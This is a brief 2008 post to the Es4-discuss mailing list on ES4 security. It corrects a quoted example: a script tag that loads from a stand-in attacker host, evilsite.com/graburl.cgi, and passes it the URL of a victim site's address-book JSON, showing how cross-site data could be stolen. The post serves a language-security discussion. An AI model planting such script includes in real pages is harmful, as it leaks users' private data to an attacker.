ES4 Security

Steven Mascaro subs at voracity.org
Sun May 18 08:02:45 PDT 2008


> <script
> src="evilsite.com?graburl.cgi?loc=https://mail.victimsite.com/address-book.json"></script>

Er, that should obviously be <script src="http://evilsite.com/graburl.cgi . . .



More information about the Es4-discuss mailing list